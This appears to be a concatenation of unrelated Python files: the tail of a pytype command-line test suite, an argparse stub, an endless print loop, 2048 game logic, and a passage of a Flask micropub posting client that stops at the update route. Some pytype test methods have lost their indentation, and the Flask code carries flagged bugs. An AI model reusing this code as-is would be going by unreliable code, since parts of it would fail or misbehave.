    self.assertHasErrors(*expected_errors)
def _InferTypesAndCheckErrors(self, filename, expected_errors):
    """Run pytype inference on `filename` (pyi to stdout) and verify the errors CSV."""
    self.pytype_args[self._DataPath(filename)] = self.INCLUDE
    self.pytype_args["--output"] = "-"
    self.pytype_args["--output-errors-csv"] = self.errors_csv
    self._RunPytype(self.pytype_args)
    # The inferred pyi is printed to stdout; errors go to the CSV only.
    self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
    self.assertHasErrors(*expected_errors)
def assertInferredPyiEquals(self, expected_pyi=None, filename=None):
    """Assert the pyi printed to stdout equals the expected pyi (AST comparison).

    Exactly one of `expected_pyi` (literal text) or `filename` (a test_data
    file to read) must be supplied.
    """
    assert bool(expected_pyi) != bool(filename)
    if filename:
        with open(self._DataPath(filename), "r") as f:
            expected_pyi = f.read()
    message = ("\n==Expected pyi==\n" + expected_pyi +
               "\n==Actual pyi==\n" + self.stdout)
    # Compare parsed ASTs so formatting differences don't cause failures.
    self.assertTrue(self._ParseString(self.stdout).ASTeq(
        self._ParseString(expected_pyi)), message)
def GeneratePickledSimpleFile(self, pickle_name, verify_pickle=True):
    """Pickle-infer test_data/simple.py into the temp dir and return the pickle path.

    Args:
      pickle_name: Basename for the output pickle inside the temp dir.
      verify_pickle: Whether to also pass --verify-pickle to pytype.

    Returns:
      The full path of the generated pickle file.
    """
    pickled_location = os.path.join(self.tmp_dir, pickle_name)
    self.pytype_args["--pythonpath"] = self.tmp_dir
    self.pytype_args["--pickle-output"] = self.INCLUDE
    self.pytype_args["--module-name"] = "simple"
    if verify_pickle:
        self.pytype_args["--verify-pickle"] = self.INCLUDE
    self.pytype_args["--output"] = pickled_location
    self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    # Use False (not the falsy int 0) for consistency with the truthy/falsy
    # contract of assertOutputStateMatches and every other call site.
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
    self.assertTrue(os.path.exists(pickled_location))
    return pickled_location
def testPickledFileStableness(self):
    """Two pickling runs of the same module must produce byte-identical files."""
    # Tests that the pickled format is stable under a constant PYTHONHASHSEED.
    l_1 = self.GeneratePickledSimpleFile("simple1.pickled")
    l_2 = self.GeneratePickledSimpleFile("simple2.pickled")
    with open(l_1, "rb") as f_1:
        with open(l_2, "rb") as f_2:
            self.assertEqual(f_1.read(), f_2.read())
def testGeneratePickledAst(self):
    """Pickling with --verify-pickle succeeds."""
    self.GeneratePickledSimpleFile("simple.pickled", verify_pickle=True)
def testGenerateUnverifiedPickledAst(self):
    """Pickling without --verify-pickle succeeds."""
    self.GeneratePickledSimpleFile("simple.pickled", verify_pickle=False)
def testPickleNoOutput(self):
    """--pickle-output without --output must be rejected with an error."""
    self.pytype_args["--pickle-output"] = self.INCLUDE
    self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testPickleBadOutput(self):
    """--pickle-output with a .pyi --output path must be rejected."""
    self.pytype_args["--pickle-output"] = self.INCLUDE
    self.pytype_args["--output"] = os.path.join(self.tmp_dir, "simple.pyi")
    self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testBadVerifyPickle(self):
    """--verify-pickle without --pickle-output must be rejected."""
    self.pytype_args["--verify-pickle"] = self.INCLUDE
    self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testNonexistentOption(self):
    """An unknown command-line option must be rejected."""
    self.pytype_args["--rumpelstiltskin"] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCfgTypegraphConflict(self):
    """--output-cfg and --output-typegraph may not share the same output path."""
    self._SetUpChecking("simple.py")
    output_path = self._TmpPath("simple.svg")
    self.pytype_args["--output-cfg"] = output_path
    self.pytype_args["--output-typegraph"] = output_path
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCheckInferConflict(self):
    """--check and --output (inference) are mutually exclusive."""
    self.pytype_args["--check"] = self.INCLUDE
    self.pytype_args["--output"] = "-"
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCheckInferConflict2(self):
    """--check may not be combined with an input:output pair."""
    self.pytype_args["--check"] = self.INCLUDE
    self.pytype_args["input.py:output.pyi"] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testInputOutputPair(self):
    """An input:- pair prints the inferred pyi to stdout."""
    self.pytype_args[self._DataPath("simple.py") +":-"] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
    self.assertInferredPyiEquals(filename="simple.pyi")
def testMultipleOutput(self):
self.pytype_args["input.py:output1.pyi"] = self.INCLUDE
self.pytype_args["--output"] = "output2.pyi"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsInputConflict(self):
self.pytype_args["--generate-builtins"] = "builtins.py"
self.pytype_args["input.py"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsPythonpathConflict(self):
self.pytype_args["--generate-builtins"] = "builtins.py"
self.pytype_args["--pythonpath"] = "foo:bar"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsPy2(self):
    # Generate the builtins file under the default Python version.
    self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.py")
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)

def testGenerateBuiltinsPy3(self):
    # Same, with an explicit Python 3 target version.
    self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.py")
    self.pytype_args["--python_version"] = "3.6"
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)

def testMissingInput(self):
    # No input file given at all: expect failure.
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)

def testMultipleInput(self):
    # More than one input file: expect failure.
    self.pytype_args["input1.py"] = self.INCLUDE
    self.pytype_args["input2.py"] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)

def testBadInputFormat(self):
    # An input spec with more than one ":" separator: expect failure.
    self.pytype_args["input.py:output.pyi:rumpelstiltskin"] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testPytypeErrors(self):
    # Checking a file with type errors reports them on stderr and the
    # run exits nonzero.
    self._SetUpChecking("bad.py")
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
    self.assertIn("[unsupported-operands]", self.stderr)
    self.assertIn("[name-error]", self.stderr)

def testPytypeErrorsCsv(self):
    # With --output-errors-csv the errors land in the CSV file and the
    # process itself exits cleanly with empty stdout/stderr.
    self._SetUpChecking("bad.py")
    self.pytype_args["--output-errors-csv"] = self.errors_csv
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
    self.assertHasErrors("unsupported-operands", "name-error")

def testPytypeErrorsNoReport(self):
    # --no-report-errors suppresses all error reporting.
    self._SetUpChecking("bad.py")
    self.pytype_args["--no-report-errors"] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)

def testPytypeReturnSuccess(self):
    # --return-success still prints the errors but exits 0.
    self._SetUpChecking("bad.py")
    self.pytype_args["--return-success"] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=False)
    self.assertIn("[unsupported-operands]", self.stderr)
    self.assertIn("[name-error]", self.stderr)
def testCompilerError(self):
    # Syntactically invalid input surfaces as python-compiler-error.
    self._CheckTypesAndErrors("syntax.py", ["python-compiler-error"])

def testMultiLineStringTokenError(self):
    # Tokenization failure inside a multi-line string.
    self._CheckTypesAndErrors("tokenerror1.py", ["python-compiler-error"])

def testMultiLineStatementTokenError(self):
    # Tokenization failure inside a multi-line statement.
    self._CheckTypesAndErrors("tokenerror2.py", ["python-compiler-error"])

def testComplex(self):
    # A larger valid file checks with no errors.
    self._CheckTypesAndErrors("complex.py", [])

def testCheck(self):
    self._CheckTypesAndErrors("simple.py", [])

def testReturnType(self):
    # Returning a str from an int-annotated function: bad-return-type.
    self._CheckTypesAndErrors(self._MakePyFile("""\
      def f() -> int:
        return "foo"
      """), ["bad-return-type"])
def testUsageError(self):
    # A python-version mismatch is a usage error reported on stderr even
    # when --output-errors-csv is set.
    self._SetUpChecking(self._MakePyFile("""\
      def f():
        pass
      """))
    # Set up a python version mismatch
    self.pytype_args["--python_version"] = "3.4"
    self.pytype_args["--output-errors-csv"] = self.errors_csv
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)

def testSkipFile(self):
    # A "pytype: skip-file" pragma yields the default (empty) pyi.
    filename = self._MakePyFile("""\
      # pytype: skip-file
      """)
    self.pytype_args[self._DataPath(filename)] = self.INCLUDE
    self.pytype_args["--output"] = "-"
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
    self.assertInferredPyiEquals(expected_pyi=self.DEFAULT_PYI)
def testInfer(self):
    # Inference on a clean file matches the golden pyi.
    self._InferTypesAndCheckErrors("simple.py", [])
    self.assertInferredPyiEquals(filename="simple.pyi")

def testInferPytypeErrors(self):
    # Inference still produces a pyi even when the file has type errors.
    self._InferTypesAndCheckErrors(
        "bad.py", ["unsupported-operands", "name-error"])
    self.assertInferredPyiEquals(filename="bad.pyi")

def testInferCompilerError(self):
    # A compile error falls back to the default (empty) pyi.
    self._InferTypesAndCheckErrors("syntax.py", ["python-compiler-error"])
    self.assertInferredPyiEquals(expected_pyi=self.DEFAULT_PYI)

def testInferComplex(self):
    self._InferTypesAndCheckErrors("complex.py", [])
    self.assertInferredPyiEquals(filename="complex.pyi")

def testCheckMain(self):
    # With --main, only the attribute-error reachable from module scope
    # (via g()) is expected in the error CSV.
    self._SetUpChecking(self._MakePyFile("""\
      def f():
        name_error
      def g():
        "".foobar
      g()
      """))
    self.pytype_args["--main"] = self.INCLUDE
    self.pytype_args["--output-errors-csv"] = self.errors_csv
    self._RunPytype(self.pytype_args)
    self.assertHasErrors("attribute-error")
def testInferToFile(self):
    # The pyi written via --output must be AST-equal (not byte-equal) to
    # the golden file.
    self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
    pyi_file = self._TmpPath("simple.pyi")
    self.pytype_args["--output"] = pyi_file
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
    with open(pyi_file, "r") as f:
        pyi = f.read()
    with open(self._DataPath("simple.pyi"), "r") as f:
        expected_pyi = f.read()
    self.assertTrue(self._ParseString(pyi).ASTeq(
        self._ParseString(expected_pyi)))

def testParsePyi(self):
    # --parse-pyi parses an existing pyi cleanly.
    self.pytype_args[self._DataPath("complex.pyi")] = self.INCLUDE
    self.pytype_args["--parse-pyi"] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)

def testPytree(self):
    """Test pytype on a real-world program."""
    self.pytype_args["--quick"] = self.INCLUDE
    self._InferTypesAndCheckErrors("pytree.py", [
        "import-error", "import-error", "attribute-error", "attribute-error",
        "attribute-error", "name-error"])
    # The inferred pyi (on stdout) must list these exact functions and
    # classes, in sorted order.
    ast = self._ParseString(self.stdout)
    self.assertListEqual(["convert", "generate_matches", "type_repr"],
                         [f.name for f in ast.functions])
    self.assertListEqual(
        ["Base", "BasePattern", "Leaf", "LeafPattern", "NegatedPattern", "Node",
         "NodePattern", "WildcardPattern"],
        [c.name for c in ast.classes])
def testNoAnalyzeAnnotated(self):
    # By default, bodies of fully annotated functions are not
    # re-analyzed, so the bad return type goes unreported.
    filename = self._MakePyFile("""\
      def f() -> str:
        return 42
      """)
    self._InferTypesAndCheckErrors(self._DataPath(filename), [])

def testAnalyzeAnnotated(self):
    # --analyze-annotated forces checking annotated function bodies.
    filename = self._MakePyFile("""\
      def f() -> str:
        return 42
      """)
    self.pytype_args["--analyze-annotated"] = self.INCLUDE
    self._InferTypesAndCheckErrors(self._DataPath(filename),
                                   ["bad-return-type"])

def testRunPytype(self):
    """Basic unit test (smoke test) for _run_pytype."""
    # TODO(kramm): This is a unit test, whereas all other tests in this file
    # are integration tests. Move this somewhere else?
    infile = self._TmpPath("input")
    outfile = self._TmpPath("output")
    with open(infile, "w") as f:
        f.write("def f(x): pass")
    argv = ["-o", outfile, infile]
    options = config.Options(argv)
    main_module._run_pytype(options)
    self.assertTrue(os.path.isfile(outfile))
def testGenerateAndUseBuiltins(self):
    """Test for --generate-builtins."""
    filename = self._TmpPath("builtins.pickle")
    # Generate builtins pickle
    self.pytype_args["--generate-builtins"] = filename
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
    self.assertTrue(os.path.isfile(filename))
    src = self._MakePyFile("""\
      import __future__
      import sys
      import collections
      import typing
      """)
    # Use builtins pickle
    self._ResetPytypeArgs()
    self._SetUpChecking(src)
    self.pytype_args["--precompiled-builtins"] = filename
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)

def testUseBuiltinsAndImportMap(self):
    """Test for --generate-builtins."""
    filename = self._TmpPath("builtins.pickle")
    # Generate builtins pickle
    self.pytype_args["--generate-builtins"] = filename
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
    self.assertTrue(os.path.isfile(filename))
    # input files
    canary = "import pytypecanary" if typeshed.Typeshed.MISSING_FILE else ""
    src = self._MakePyFile("""\
      import __future__
      import sys
      import collections
      import typing
      import foo
      import csv
      import ctypes
      import xml.etree.ElementTree as ElementTree
      import md5
      %s
      x = foo.x
      y = csv.writer
      z = md5.new
      """ % canary)
    pyi = self._MakeFile("""\
      import datetime
      x = ... # type: datetime.tzinfo
      """, extension=".pyi")
    # Use builtins pickle with an imports map
    self._ResetPytypeArgs()
    self._SetUpChecking(src)
    self.pytype_args["--precompiled-builtins"] = filename
    self.pytype_args["--imports_info"] = self._MakeFile("""\
      typing /dev/null
      foo %s
      """ % pyi, extension="")
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testBuiltinsDeterminism2(self):
    # Two builtins generations for the same version must compare equal.
    f1, f2 = self._GenerateBuiltinsTwice("2.7")
    self.assertBuiltinsPickleEqual(f1, f2)

def testBuiltinsDeterminism3(self):
    # Same determinism check for a Python 3 version.
    f1, f2 = self._GenerateBuiltinsTwice("3.6")
    self.assertBuiltinsPickleEqual(f1, f2)

def testTimeout(self):
    # Note: At the time of this writing, pickling builtins takes well over one
    # second (~10s). If it ever was to get faster, this test would become flaky.
    self.pytype_args["--timeout"] = 1
    self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.pickle")
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=True)
def main():
    """Run the test suite via unittest's CLI entry point."""
    unittest.main()


if __name__ == "__main__":
    main()
|
python
|
#!/usr/bin/env python
import argparse
def main(args):
    """Print the parsed command-line namespace.

    This is some doc
    """
    print(args)
def sub_function():
    """Placeholder; never called anywhere in this script.

    Here is some doc about this sub function
    """
    pass
def parse_arguments():
    """Parse CLI arguments; returns the argparse Namespace.

    NOTE(review): -t/--type defaults to the boolean False but argparse
    will store a string when the flag is given — confirm intended type.
    """
    parser = argparse.ArgumentParser(description="")
    parser.add_argument("-t", "--type", default=False)
    return parser.parse_args()
# Script entry point: parse CLI arguments and hand them to main().
if __name__ == "__main__":
    args = parse_arguments()
    main(args)
|
python
|
# Endless loop: prints the two messages forever (interrupt to stop).
while (True):
    print("mohammed uddin made changes")
    print(":D")
|
python
|
# logic.py to be
import random
# NOTE(review): `global` at module scope is a no-op, and actual_score is
# never assigned or read anywhere in this file — dead statement.
global actual_score
def start_game():
    """Create a fresh 4x4 board for a new game.

    Returns a 4x4 list-of-lists of ints, all zero except one randomly
    placed starting 2 (added by add_new_2).
    """
    # Build the empty 4x4 grid.
    grid = [[0, 0, 0, 0] for _ in range(4)]
    # Seed the board with its first tile.
    add_new_2(grid)
    return grid
# function to add a new 2 in
# grid at any random empty cell
def add_new_2(mat):
    """Place a 2 in a uniformly random empty cell of the 4x4 grid.

    Mutates ``mat`` in place and returns the same grid object.

    Fix over the original: the old rejection-sampling loop gave up after
    50 random probes, so on a nearly-full board it could fail to place a
    tile even though empty cells existed (and it used bitwise ``&`` where
    boolean ``and`` was meant). Choosing directly from the empty cells is
    both correct and uniform; a full board is returned unchanged, which
    matches the old give-up behavior.
    """
    empty_cells = [(r, c) for r in range(4) for c in range(4) if mat[r][c] == 0]
    if empty_cells:
        r, c = random.choice(empty_cells)
        mat[r][c] = 2
    return mat
# function to get the current
# state of game
def get_current_state(mat):
    """Classify the 4x4 board.

    Returns 'WON' if any cell holds 2048, 'GAME NOT OVER' if a move is
    still possible (an empty cell or a mergeable adjacent pair exists),
    and 'LOST' otherwise.
    """
    # A 2048 tile anywhere means victory.
    if any(2048 in row for row in mat):
        return 'WON'
    # Any empty cell means play can continue.
    if any(0 in row for row in mat):
        return 'GAME NOT OVER'
    # Board is full: a move is still possible only if two equal
    # neighbours (horizontal or vertical) can merge.
    for i in range(4):
        for j in range(4):
            if j < 3 and mat[i][j] == mat[i][j + 1]:
                return 'GAME NOT OVER'
            if i < 3 and mat[i][j] == mat[i + 1][j]:
                return 'GAME NOT OVER'
    # No empty cell and no possible merge.
    return 'LOST'
# all the functions defined below
# are for left swap initially.
# function to compress the grid
# after every step before and
# after merging cells.
def compress(mat):
    """Slide all non-zero tiles of each row to the left.

    Returns (new_grid, changed): new_grid is a freshly allocated 4x4
    grid, changed is True iff at least one tile actually moved.
    """
    moved = False
    result = [[0] * 4 for _ in range(4)]
    for i, row in enumerate(mat):
        dest = 0  # next free column in the compressed row
        for j, val in enumerate(row):
            if val != 0:
                result[i][dest] = val
                # A tile "moved" if it landed left of where it started.
                if dest != j:
                    moved = True
                dest += 1
    return result, moved
# function to merge the cells
# in matrix after compressing
def merge(mat):
    """Merge equal horizontally adjacent tiles, left cell wins.

    Mutates ``mat`` in place. Returns (mat, changed, score) where score
    is the sum of the newly created tile values.
    """
    changed = False
    score = 0
    for row in mat:
        for j in range(3):
            # Two equal non-empty neighbours collapse into the left cell,
            # leaving a zero behind.
            if row[j] != 0 and row[j] == row[j + 1]:
                row[j] *= 2
                row[j + 1] = 0
                score += row[j]
                changed = True
    return mat, changed, score
# function to reverse the matrix
# means reversing the content of
# each row (reversing the sequence)
def reverse(mat):
    """Return a new 4x4 grid with each row's order flipped."""
    return [[mat[i][3 - j] for j in range(4)] for i in range(4)]
# function to get the transpose
# of matrix means interchanging
# rows and column
def transpose(mat):
    """Return a new 4x4 grid with rows and columns swapped."""
    return [[mat[j][i] for j in range(4)] for i in range(4)]
# function to update the matrix
# if we move / swipe left
def move_left(grid):
    """Apply a left swipe: compress, merge, then compress again.

    Returns (new_grid, changed, score). `changed` reflects only the
    first compress and the merge; the final gap-closing compress is
    deliberately excluded, matching the game's original semantics.
    """
    compressed, shifted = compress(grid)
    merged, combined, score = merge(compressed)
    # Merging opens gaps, so close them with one more compress.
    final_grid, _ = compress(merged)
    return final_grid, shifted or combined, score
# function to update the matrix
# if we move / swipe right
def move_right(grid):
    """Apply a right swipe by mirroring, moving left, mirroring back."""
    mirrored = reverse(grid)
    mirrored, changed, score = move_left(mirrored)
    # Undo the mirror to get the right-swipe result.
    return reverse(mirrored), changed, score
# function to update the matrix
# if we move / swipe up
def move_up(grid):
    """Apply an upward swipe via transpose + left move + transpose."""
    flipped = transpose(grid)
    flipped, changed, score = move_left(flipped)
    # Transposing back converts the left move into an upward one.
    return transpose(flipped), changed, score
# function to update the matrix
# if we move / swipe down
def move_down(grid):
    """Apply a downward swipe via transpose + right move + transpose."""
    flipped = transpose(grid)
    flipped, changed, score = move_right(flipped)
    # Transposing back converts the right move into a downward one.
    return transpose(flipped), changed, score
# this file only contains all the logic
# functions to be called in main function
# present in the other file
|
python
|
import os
from flask import request, render_template, redirect, session, Blueprint, flash, jsonify, abort, send_from_directory
from werkzeug.utils import secure_filename
import indieweb_utils
from bs4 import BeautifulSoup
import requests
from config import ENDPOINT_URL, TWITTER_BEARER_TOKEN, UPLOAD_FOLDER, MEDIA_ENDPOINT_URL, CLIENT_ID
client = Blueprint("client", __name__, static_folder="static", static_url_path="")
@client.route("/", methods=["GET", "POST"])
def index():
    """Landing page and action dispatcher.

    GET: render the dashboard when logged in, the public index page
    otherwise. POST (logged-in only): run an "update", "delete" or
    "undelete" action on the URL in the form, forwarding delete and
    undelete to the micropub endpoint. A POST without a session is 403.
    """
    if session.get("access_token"):
        user = session["access_token"]
        me = session["me"]
    else:
        user = None
        me = None
    if request.method == "POST":
        if user:
            url = request.form["url"]
            if request.form["action"] == "update":
                return redirect(f"/update?url={url}")
            elif request.form["action"] == "delete":
                # The granted token scope must include "delete".
                if session.get("scope") and not "delete" in session.get("scope").split(" "):
                    # Fix: this branch deletes posts, but the message
                    # previously said "update posts" by mistake.
                    flash("You do not have permission to delete posts.")
                    return redirect("/")
                http_request = requests.post(
                    ENDPOINT_URL,
                    json={
                        "type": ["h-entry"],
                        "action": "delete",
                        "url": url
                    },
                    headers={
                        "Authorization": f"Bearer {user}"
                    }
                )
                if http_request.status_code == 200 or http_request.status_code == 201:
                    flash(f"Your {url} post was successfully deleted.")
                else:
                    flash(http_request.json()["message"].strip("."))
                return render_template("user/dashboard.html", user=user, me=me, title="WriteIt Home", action="delete")
            elif request.form["action"] == "undelete":
                # The granted token scope must include "undelete".
                if session.get("scope") and not "undelete" in session.get("scope").split(" "):
                    flash("You do not have permission to undelete posts.")
                    return redirect("/")
                http_request = requests.post(
                    ENDPOINT_URL,
                    json={
                        "type": ["h-entry"],
                        "action": "undelete",
                        "url": url
                    },
                    headers={
                        "Authorization": f"Bearer {user}"
                    }
                )
                if http_request.status_code == 200 or http_request.status_code == 201:
                    flash(f"Your {url} post was successfully undeleted.")
                else:
                    flash(http_request.json()["message"].strip("."))
                return render_template(
                    "user/dashboard.html",
                    user=user,
                    me=me,
                    title="WriteIt Home",
                    action="undelete"
                )
            # Unknown action: bounce back to the dashboard.
            return redirect("/")
        # POST without a logged-in session is forbidden.
        abort(403)
    if user is not None:
        return render_template(
            "user/dashboard.html",
            user=user,
            me=me,
            title="WriteIt Dashboard",
            action=None
        )
    else:
        return render_template(
            "index.html",
            user=user,
            me=me,
            title="Home WriteIt",
            action=None
        )
@client.route("/post", methods=["GET", "POST"])
def create_post():
    # Post-composition form. GET renders the editor (optionally with
    # reply context); POST builds a micropub payload and submits it.
    if session.get("access_token"):
        user = session["access_token"]
        me = session["me"]
    else:
        return redirect("/login")
    post_type = request.args.get("type")
    request_type = None
    # (display name, micropub property) pairs this form can create.
    accepted_post_types = (
        ("like", "like-of"),
        ("repost", "repost-of"),
        ("bookmark", "bookmark-of"),
        ("rsvp", "rsvp"),
        ("reply", "in-reply-to"),
        ("checkin", ""),
        ("checkin", ""),
        ("photo", ""),
        ("watch", "")
    )
    for item in accepted_post_types:
        post, attribute = item
        if post_type == post:
            title = f"Create a {post.title()} Post"
            url = request.args.get(attribute)
            request_type = attribute
    # NOTE(review): when ?type= matches none of the accepted types,
    # `title` and `url` are never bound, so the final render_template
    # below would raise UnboundLocalError — confirm the input space.
    if post_type == "photo" and "media" not in session.get("scope").split(" "):
        flash("You need to grant the 'media' scope to upload photos.")
        return redirect("/")
    if request.method == "POST":
        form_encoded = request.form.to_dict()
        if form_encoded.get("access_token"):
            del form_encoded["access_token"]
        # Preview requests bounce back to the GET view with is_previewing set.
        if request.form.get("preview") and not request.form.get("in-reply-to"):
            post_type = None
            if request.form.get("like-of"):
                return redirect(f"/post?type=like&like-of={request.form.get('like-of')}&is_previewing=true")
            if request.form.get("bookmark-of"):
                return redirect(f"/post?type=bookmark&bookmark-of={request.form.get('bookmark-of')}&is_previewing=true")
            if request.form.get("repost-of"):
                return redirect(f"/post?type=repost&repost-of={request.form.get('repost-of')}&is_previewing=true")
        if me and user:
            # Microformats2 JSON payload sent to the micropub endpoint.
            data = {
                "type": ["h-entry"],
                "properties": {}
            }
            form_types = ["in-reply-to", "like-of", "repost-of", "bookmark-of", "watch-of"]
            for key in form_encoded:
                if key in form_types:
                    # NOTE(review): raises KeyError if the form lacks "h"
                    # or "action", and stores the entire remaining form
                    # dict as the property value — verify both behaviors.
                    del form_encoded["h"]
                    del form_encoded["action"]
                    data["properties"][key] = [form_encoded]
                    url = form_encoded[key]
                    request_type = key
                    break
            if request.form.get("syndication") and request.form.get("syndication") != "none":
                data["syndication"] = [request.form.get("syndication")]
            if request.form.get("category") == "RSVP":
                # RSVP posts carry their event details in p-rsvp.
                data["p-rsvp"] = {}
                data["p-rsvp"]["properties"] = {
                    "event_name": request.form.get("event_name"),
                    "in-reply-to": request.form.get("in-reply-to"),
                    "state": request.form.get("state"),
                    "content": [request.form.get("content")],
                    "event_date": request.form.get("event_date"),
                    "event_time": request.form.get("event_time")
                }
            elif request.form.get("venue_name"):
                # Checkin posts: venue name plus coordinates.
                # NOTE(review): this first assignment is immediately
                # overwritten by the next one — dead statement.
                data["properties"] = {"checkin": [{"properties": {}}]}
                data["properties"] = {
                    "checkin": [
                        {
                            "properties": {
                                "name": request.form.get("venue_name"),
                                "latitude": request.form.get("latitude"),
                                "longitude": request.form.get("longitude")
                            }
                        }
                    ]
                }
                if request.form.get("content"):
                    data["properties"]["checkin"][0]["properties"]["content"] = [request.form.get("content")]
                if not request.form.get("venue_name") or not request.form.get("latitude") or not request.form.get("longitude"):
                    flash("Please enter a valid venue name, latitude, and longitude value.")
                    return render_template("post/create_post.html", title=title, post_type=post_type, user=user, me=me)
            else:
                # Plain note/article: copy over the optional fields.
                if request.form.get("title"):
                    data["properties"]["title"] = [request.form.get("title")]
                if request.form.get("content"):
                    data["properties"]["content"] = [request.form.get("content")]
                if request.form.get("category"):
                    data["properties"]["category"] = request.form.get("category").split(", ")
                if request.form.get("is_hidden"):
                    data["properties"]["is_hidden"] = [request.form.get("is_hidden")]
            # Content containing markup is sent as {"html": ...};
            # plain text is sent as a bare string.
            if request.form.get("content") and BeautifulSoup(request.form.get("content"), "lxml") and BeautifulSoup(request.form.get("content"), "lxml").find():
                data["properties"]["content"] = [{"html": request.form.get("content")}]
            elif request.form.get("content") and request.form.get("content") is not None:
                data["properties"]["content"] = [request.form.get("content")]
            photo = request.files.get("photo")
            if photo:
                # Save locally, then re-upload to the media endpoint.
                photo.save(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)))
                # if session.get("config"):
                #     photo_r = requests.post(session["config"]["media-endpoint"], files={"file": (secure_filename(photo.filename),open(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)), "rb"), 'image/jpeg')}, headers={"Authorization": "Bearer " + user})
                # else:
                photo_http_request = requests.post(
                    MEDIA_ENDPOINT_URL,
                    files={
                        "file": (
                            secure_filename(photo.filename),
                            open(os.path.join(UPLOAD_FOLDER, secure_filename(photo.filename)), "rb"),
                            'image/jpeg'
                        )
                    },
                    headers={
                        "Authorization": "Bearer " + user
                    }
                )
            check_for_alt_text = False
            if photo:
                # The media endpoint returns the stored URL in Location.
                data["properties"]["photo"] = [{ "value": photo_http_request.headers["Location"] }]
                check_for_alt_text = True
            if check_for_alt_text and request.form.get("image_alt_text"):
                data["properties"]["photo"][0]["alt"] = request.form.get("image_alt_text")
            if request.form.get("format") == "form_encoded":
                # Submit as classic form-encoded micropub instead of JSON.
                form_encoded["h"] = "entry"
                categories = []
                if form_encoded.get("category") and len(form_encoded.get("category").split(", ")) > 0:
                    for i in form_encoded.get("category").replace(", ", ",").split(","):
                        categories += [i]
                    form_encoded["category[]"] = categories
                http_request = requests.post(ENDPOINT_URL, data=form_encoded, headers={"Authorization": f"Bearer {user}"})
            else:
                http_request = requests.post(ENDPOINT_URL, json=data, headers={"Authorization": f"Bearer {user}"})
            try:
                response = http_request.json()["message"]
            except:
                response = http_request.text
            if http_request.status_code != 200 and http_request.status_code != 201:
                flash("Error: " + str(response))
            if http_request.headers.get("Location"):
                return redirect(http_request.headers["Location"])
            flash("Your post was successfully created.")
            title = "Create Post"
            return render_template("post/create_post.html", title=title, post_type=post_type, user=user, me=me)
        return jsonify({"error": "You must be logged in to create a post."}), 401
    # GET with a target URL: fetch reply context for the editor preview.
    if request_type is not None and url:
        site_supports_webmention, h_entry = indieweb_utils.get_reply_context(url, twitter_bearer_token=TWITTER_BEARER_TOKEN)
    else:
        h_entry = None
        site_supports_webmention = False
    is_previewing = False
    if request.args.get("is_previewing") and request.args.get("is_previewing") == "true":
        is_previewing = True
    return render_template(
        "post/create_post.html",
        title=title,
        post_type=post_type,
        user=user,
        me=me,
        url=url,
        h_entry=h_entry,
        site_supports_webmention=site_supports_webmention,
        is_previewing=is_previewing
    )
@client.route("/update", methods=["GET", "POST"])
def update_post():
